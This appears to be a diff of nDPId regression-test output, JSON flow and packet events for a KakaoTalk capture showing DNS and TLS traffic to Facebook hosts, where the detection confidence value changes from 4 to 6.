00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1430069030748,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"thread_ts_msec":1430069030748,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGbtpgAANREvUAq8AQEKGFK8ADVgFABSeRsnwIGAAAEAAgAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQABwAwABQABAAAD6wAMBHN0YXIEYzEwcsAQwC4AAQABAAAACQAEHw1EVA=="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030748,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030748,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030751,"flow_last_seen":1430069030751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030751,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1430069030751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030751,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwzN0AAPwZIUAoYUrwfDURUsJkBu9qbOCoAAAAAoAI5CH68AAACBAV4BAIICgALCx0AAAAAAQMDBw=="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1430069030835,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030835,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAAjgYshx8NRFQKGFK8AbuwmcDC6aramzgroBKpsCsUAAACBAV4BAIICqKRlfAACwsdAQMDBg=="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1430069030839,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069030839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQzOEAAPwZIVwoYUrwfDURUsJkBu9qbOCvAwumrgBAAcwLZAAABAQgKAAsLJaKRlfA="} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1430069030978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":80,"pkt_l4_len":44,"thread_ts_msec":1430069030978,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEAAAEAAQBHSHAoYUrwKvAEBTH4ANQAsPIiqhwEAAAEAAAAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAE="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, 
OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., 
CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1430069031017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":138,"pkt_l4_len":102,"thread_ts_msec":1430069031017,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHocCwAANREA2Aq8AQEKGFK8ADVMfgBmmjSqh4GAAAEAAwAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAHADAAFAAEAAAVxAAYDYXBpwBLAMAAFAAEAAAV2AAwEc3RhcgRjMTBywBLAQgABAAEAAAARAAQfDURG"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069031017,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.70"}} 
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069031017,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.70"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031042,"flow_last_seen":1430069031042,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1430069031042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031042,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADx6qUAAPwYA7AoYUrwfDURGqj0Bu4p9cZMAAAAAoAI5CJu+AAACBAV4BAIICgALCzoAAAAAAQMDBw=="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1430069031079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031079,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwwtUAA+AaR7x8NREYKGFK8AbuqPWAZ05aKfXGUYBIRHOtUAAACBAV4"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1430069031083,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACh6qkAAPwYA\/woYUrwfDURGqj0Bu4p9cZRgGdOXUBA5CNrpAAA="} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1430069031167,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":85,"pkt_l4_len":49,"thread_ts_msec":1430069031167,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEUAAEAAQBHSFwoYUrwKvAEBD7EANQAxznCJ\/wEAAAEAAAAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAQ=="} -00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01034{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, 
